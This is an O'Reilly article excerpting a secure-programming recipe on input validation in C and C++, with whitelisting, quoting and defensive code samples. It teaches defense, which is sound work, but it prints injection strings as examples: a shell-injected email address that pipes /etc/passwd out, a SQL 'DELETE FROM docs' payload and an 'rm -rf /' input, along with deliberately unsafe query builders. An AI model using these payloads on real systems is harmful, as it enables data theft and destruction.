Editor's note: In this first installment of a three-part series of sample recipes from Secure Programming Cookbook for C and C++, the authors offer nine basic rules for proper data validation, which they recommend all programmers follow. From their first rule, "Assume all input is guilty until proven otherwise," to their last, "The better you understand the data, the better you can filter it," the advice presented here will help programmers keep unwanted, malicious data out of their applications.
You have data coming into your application, and you would like to filter or reject data that might be malicious.
Perform data validation at all levels whenever possible. At the very least, make sure data is filtered on input.
Match constructs that are known to be valid and harmless. Reject anything else.
In addition, be sure to be skeptical about any data coming from a potentially insecure channel. In a client-server architecture, for example, even if you wrote the client, the server should never assume it is talking to a trusted client.
Applications should not trust any external input. We have often seen situations in which people had a custom client-server application and the application developer assumed that, because the client was written in house by trusted, strong coders, there was nothing to worry about in terms of malicious data being injected.
Those kinds of assumptions lead people to do things that turn out badly, such as embedding in a client SQL queries or shell commands that get sent to a server and executed. In such a scenario, an attacker who is good at reverse engineering can replace the SQL code in the client-side binary with malicious SQL code (perhaps code that reads private records or deletes important data). The attacker could also replace the actual client with a handcrafted client.
In many situations, an attacker who does not even have control over the client is nevertheless able to inject malicious data. For example, he might inject bogus data into the network stream. Cryptography can sometimes help, but even then, we have seen situations in which the attacker did not need to send data that decrypted properly to cause a problem, for example by triggering a buffer overflow in the portion of an application that does the decryption.
You can regard input validation as a kind of access control mechanism. For example, you will generally want to validate that the person on the other end of the connection has the right credentials to perform the operations that she is requesting. However, when you're doing data validation, most often you'll be worried about input that might do things that no user is supposed to be able to do.
For example, an access control mechanism might determine whether a user has the right to use your application to send email. If the user has that privilege, and your software calls out to the shell to send email (which is generally a bad idea), the user should not be able to manipulate the data in such a way that he can do anything other than send mail as intended.
Let's look at basic rules for proper data validation.
As we said earlier, you should never trust input that comes from outside the trusted base. In addition, you should be very skeptical about which components of the system are trusted, even after you have authenticated the user on the other end!
If you determine that a piece of data might possibly be malicious, your best bet from a security perspective is to assume that using the data will screw you up royally no matter what you do, and act accordingly. In some environments, you might need to be able to handle arbitrary data, in which case you will need to treat all input in a way that ensures everything is benign. Avoid the latter situation if possible, because it is a lot harder to get right.
One of the most important principles in computer security, defense in depth, states that you should provide multiple defenses against a problem in case any single defense fails. This is important in input validation. You can check the validity of data as it comes in from the network, and you can check it again right before you use it in a manner that might have security implications. However, each of these techniques alone is somewhat error-prone.
When you're checking input at the points where data arrives, be aware that components might get ripped out and matched with code that does not do the proper checking, making the components less robust than they should be. More importantly, when data is fresh from the network, it is often very difficult to understand its context well enough to make validation easy. That is, routines that read from a socket usually do not understand anything about the state the application is in. Without such knowledge, input routines can do only rudimentary filtering.
On the other hand, when you're checking input at the point before you use it, it's often easy to forget to perform the check. Most of the time, you will want to make life easier by producing your own wrapper API to do the filtering, but sometimes you might forget to call it or end up calling it improperly. For example, many people try to use strncpy() to help prevent buffer overflows, but it is easy to use this function in the wrong way, as we discuss in Recipe 3.3.
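One common misuse is calling strncpy() with the full size of the destination, which leaves the destination without a terminating NUL whenever the source is at least that long. The wrapper below is a minimal sketch of the kind of filtering API described above, not the code from Recipe 3.3; the name checked_copy() and its reject-rather-than-truncate policy are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical wrapper (illustration only): copy src into dst, which has
 * room for dst_size bytes. Returns 0 on success and -1 if the arguments
 * are invalid or src does not fit. Unlike a bare strncpy(), dst is always
 * NUL-terminated when dst_size > 0, and oversized input is rejected
 * instead of being silently truncated.
 */
int checked_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';              /* leave dst in a defined state on failure */
    if (src == NULL)
        return -1;

    len = strlen(src);
    if (len >= dst_size)        /* no room for the terminating NUL */
        return -1;

    memcpy(dst, src, len + 1);  /* len + 1 copies the NUL as well */
    return 0;
}
```

Callers still have to check the return value; with an 8-byte buffer, a 7-character string is accepted and an 8-character string is rejected.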
Editor's note: Recipe 3.3, Input Validation in C and C++, was first published on our site as a "Beta Recipe" in May 2003. Now that the book is on store shelves we have updated the article so it reflects the final version of the recipe as you'll find it in the printed book.
Many data input problems involve the program's passing off data that came from an untrusted source to some other entity that actually parses and acts on the data. If the component doing the parsing has to trust its caller, bad things can happen if your software does not do the proper checking. The best known example of this is the Unix command shell. Sometimes, programs will accomplish tasks by using functions such as popen() that invoke a shell (which is often a bad idea by itself; see Recipe 1.7). (We'll look at the shell input problem later in this chapter.) Another popular example is the database query using the SQL language. (We'll discuss input validation problems with SQL in
One obvious thing to do when using a command language such as the Unix shell or SQL is to construct commands in trusted software, instead of allowing users to send commands that get proxied. However, there is another "gotcha" here. Suppose that you provide users the ability to search a database for a word. When the user gives you that word, you may be inclined to concatenate it to your SQL command. If you do not validate the input, the user might be able to run other commands.
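To make the "gotcha" concrete, here is a deliberately unsafe sketch of the concatenation described above. The table name docs, the columns title and body, and the function name are hypothetical; the only point is to show what text the database would receive.

```c
#include <stdio.h>

/*
 * Deliberately UNSAFE illustration: splice an untrusted search word
 * directly into a SQL command. Table and column names are hypothetical.
 * Returns 0 on success, -1 if the command does not fit in out.
 */
int build_search_query_unsafe(char *out, size_t out_size, const char *word)
{
    /* "%%" emits a literal '%', so the pattern becomes '%<word>%' */
    int n = snprintf(out, out_size,
                     "SELECT title FROM docs WHERE body LIKE '%%%s%%'", word);

    return (n < 0 || (size_t)n >= out_size) ? -1 : 0;
}
```

For the word `cookbook` the result is the intended single query. For the word `x'; DELETE FROM docs; --` the result is `SELECT title FROM docs WHERE body LIKE '%x'; DELETE FROM docs; --%'`, in which the user's quote has closed the string literal and the rest of the input reads as a second command.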
Consider what happens if you have a server application that, among other things, can send email. Suppose that the email address comes from an untrusted client. If the email address is placed into a buffer using a format string such as "/bin/mail %s < /tmp/email", what happens if the user submits the following email address:
"email@example.com; cat /etc/passwd | mail
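The following sketch shows the command string such a server would hand to the shell. It is an illustration of the problem, not something to deploy; the function name is hypothetical, and because the address above is cut off in this copy, the recipient attacker@example.org used in the note below is an assumption.

```c
#include <stdio.h>

/*
 * Deliberately UNSAFE illustration: place an untrusted address into the
 * shell command using the format string from the text.
 * Returns 0 on success, -1 if the command does not fit in out.
 */
int build_mail_command_unsafe(char *out, size_t out_size, const char *addr)
{
    int n = snprintf(out, out_size, "/bin/mail %s < /tmp/email", addr);

    return (n < 0 || (size_t)n >= out_size) ? -1 : 0;
}
```

Given the address `email@example.com; cat /etc/passwd | mail attacker@example.org`, the buffer holds `/bin/mail email@example.com; cat /etc/passwd | mail attacker@example.org < /tmp/email`. A shell treats the semicolon as a command separator, so it runs /bin/mail and then a second pipeline that the user chose.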
There are two different approaches to data filtering. With the first, known as whitelisting, you accept input as valid only if it meets specific criteria. Otherwise, you reject it. If you do this, the major thing you need to worry about is whether the rules that define your whitelist are actually correct!
With the other approach, known as blacklisting, you reject only those things that are known to be bad. It is much easier to get your policy wrong when you take this approach.
For example, if you really want to invoke a mail program by calling a shell, you might take a whitelist approach in which you allow only well-formed email addresses, as discussed in Recipe 3.9. Or you might use a slightly more liberal (less exact) whitelist policy in which you only allow letters, digits, the @ sign, and periods.
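The more liberal policy can be sketched in a few lines. This is a minimal example under stated assumptions: the function name and the caller-supplied length limit are hypothetical, the character ranges assume an ASCII-compatible character set, and the check says nothing about whether the address is well formed.

```c
#include <stddef.h>

/* Allowed characters: letters, digits, '@', and '.' (assumes ASCII). */
static int is_allowed_char(unsigned char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '@' || c == '.';
}

/*
 * Hypothetical whitelist check. Returns 1 if s is non-empty, at most
 * max_len characters long, and made up only of allowed characters;
 * returns 0 otherwise. Anything not explicitly allowed is rejected.
 */
int is_whitelisted_address(const char *s, size_t max_len)
{
    size_t i;

    if (s == NULL || s[0] == '\0')
        return 0;
    for (i = 0; s[i] != '\0'; i++) {
        if (i >= max_len)                       /* too long */
            return 0;
        if (!is_allowed_char((unsigned char)s[i]))
            return 0;
    }
    return 1;
}
```

With this policy, `email@example.com` passes, while any address containing a space, semicolon, pipe, or quote is rejected without the code having to know why those characters are dangerous.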
With a blacklist approach, you might try to block out every character that might be leveraged in an attack. It is hard to be sure that you are not missing something here, particularly if you try to consider every single operational environment in which your software may be deployed. For example, if calling out to a shell, you may find all the special characters for the bash shell and check for those, but leave people using tcsh (or something unusual) open to attack.
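As an illustration of how a blacklist goes wrong, the sketch below compares a hand-picked blacklist with a whitelist on the same input. Both function names and the particular blacklist are hypothetical, and the blacklist is incomplete on purpose.

```c
#include <string.h>

/*
 * Blacklist sketch: reject only the characters someone remembered to
 * list. Returns 1 if s contains none of them, 0 otherwise.
 */
int passes_blacklist(const char *s)
{
    return strpbrk(s, ";|&<>") == NULL;
}

/*
 * Whitelist sketch for comparison: accept only letters, digits, '@',
 * and '.'. Returns 1 if s is non-empty and every character is allowed.
 */
int passes_whitelist(const char *s)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789@.";

    /* strspn() returns the length of the leading run of allowed chars */
    return s[0] != '\0' && s[strspn(s, allowed)] == '\0';
}
```

The blacklist stops `a;b`, but it lets through backquotes, `$(...)`, and embedded newlines, all of which many shells treat specially. The whitelist rejects every one of those inputs because none of the characters involved were ever allowed.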
Sometimes, you really do need to be able to accept arbitrary data from an untrusted source and use that data in a security-critical way. For example, you might want to be able to put arbitrary contents from arbitrary documents into a database. In such a case, you might look for some kind of quoting mechanism. For example, you can usually stick untrusted data in single quotes in such an environment.
However, you need to be aware of ways in which an attacker can leave the quoted environment, and you must actively make sure that the attacker does not try to use them. For example, what happens if the attacker puts a single quote in the data? Will that end the quoting, allowing the rest of the attacker's data to do malicious things? If there are such escapes, you should check for them. In this particular example, you might be able to replace quotes in the attacker's data with a backslash followed by a quote.
Following from the previous point, if you need to filter data instead of rejecting potentially harmful data, it is useful to provide functions that properly quote an arbitrary piece of data for you. For example, you might have a function that quotes a string for a database, ensuring that the input will always be interpreted as a single string and nothing more. Such a function would put quotes around the string and additionally escape anything that could thwart the surrounding quotes (such as a nested quote).
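A quoting function of this kind might look like the sketch below. Note one substitution: instead of the backslash escape mentioned earlier, it doubles each embedded single quote, which is the escape defined by standard SQL string literals. That choice assumes a database that does not also treat backslash as an escape character inside literals; where it does, this function is not sufficient by itself. The name sql_quote() is hypothetical, and where the database library offers its own quoting routine or parameterized statements, those are generally the better choice.

```c
#include <stddef.h>

/*
 * Hypothetical helper: write src into dst as one single-quoted SQL
 * string literal, doubling every embedded single quote.
 * Assumes standard SQL literal syntax with no backslash escapes.
 * Returns 0 on success, or -1 if the arguments are invalid or the
 * result (including the terminating NUL) does not fit in dst_size bytes.
 */
int sql_quote(char *dst, size_t dst_size, const char *src)
{
    size_t o = 0;   /* next write position in dst */
    size_t i;

    if (dst == NULL || src == NULL || dst_size < 3)
        return -1;  /* need room for at least '' plus the NUL */

    dst[o++] = '\'';
    for (i = 0; src[i] != '\0'; i++) {
        size_t need = (src[i] == '\'') ? 2 : 1;

        /* keep two bytes in reserve for the closing quote and the NUL */
        if (o + need + 2 > dst_size) {
            dst[0] = '\0';
            return -1;
        }
        if (src[i] == '\'')
            dst[o++] = '\'';    /* escape a quote by doubling it */
        dst[o++] = src[i];
    }
    dst[o++] = '\'';
    dst[o] = '\0';
    return 0;
}
```

The input `O'Reilly` becomes `'O''Reilly'`, and the input `x'; DELETE FROM docs; --` becomes `'x''; DELETE FROM docs; --'`, which a standard SQL parser reads as one string and nothing more.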
Rough heuristics like "accept the following characters" do not always work well for data validation. Even if you filter out all bad characters, are the resulting combinations of benign characters a problem? For example, if you pass untrusted data through a shell, do you want to take the risk that an attacker might be able to ignore metacharacters but still do some damage by throwing in a well-placed shell keyword?
The best way to ensure that data is not bad is to do your very best to understand the data and the context in which that data will be used. Therefore, even if you're passing data on to some other component, if you need to trust the data before you send it, you should parse it as accurately as possible. Moreover, in situations where you cannot be accurate, at least be conservative, and assume that the data is malicious.
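As a small illustration of parsing accurately and conservatively, suppose a field is supposed to hold a TCP port number. The field, the function name, and the accepted range are assumptions made for this sketch; the point is that the code accepts exactly the form it understands and rejects everything else, rather than scanning for "bad" characters.

```c
#include <errno.h>
#include <stdlib.h>

/*
 * Hypothetical example: strictly parse a decimal TCP port (1-65535).
 * Returns 0 and stores the value in *port on success, -1 otherwise.
 */
int parse_port(const char *s, unsigned int *port)
{
    char *end;
    long v;

    if (s == NULL || port == NULL)
        return -1;

    /* strtol() skips leading whitespace and accepts a sign, so insist
       that the very first character is a digit. */
    if (s[0] < '0' || s[0] > '9')
        return -1;

    errno = 0;
    v = strtol(s, &end, 10);
    if (errno == ERANGE || *end != '\0')    /* overflow or trailing junk */
        return -1;
    if (v < 1 || v > 65535)                 /* outside the valid range */
        return -1;

    *port = (unsigned int)v;
    return 0;
}
```

Here `8080` is accepted, while `80; rm -rf /`, ` 80`, `-1`, `0`, and `65536` are all rejected, including inputs that a looser call such as atoi() would quietly turn into a number.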
See also Recipe 1.7, Recipe 3.3, Recipe 3.9, and Recipe 3.11 of Secure Programming Cookbook for C and C++.
Check back here next Tuesday (July 29) for a recipe from Secure Programming Cookbook for C and C++ on evaluating URL encodings.
Matt Messier is Director of Engineering at Secure Software, and coauthor of O'Reilly's "Network Security with OpenSSL."
John Viega is CTO of the SaaS Business Unit at McAfee and the author of many security books, including Building Secure Software (Addison-Wesley), Network Security with OpenSSL (O'Reilly), and the forthcoming Myths of Security (O'Reilly).
Copyright © 2009 O'Reilly Media, Inc.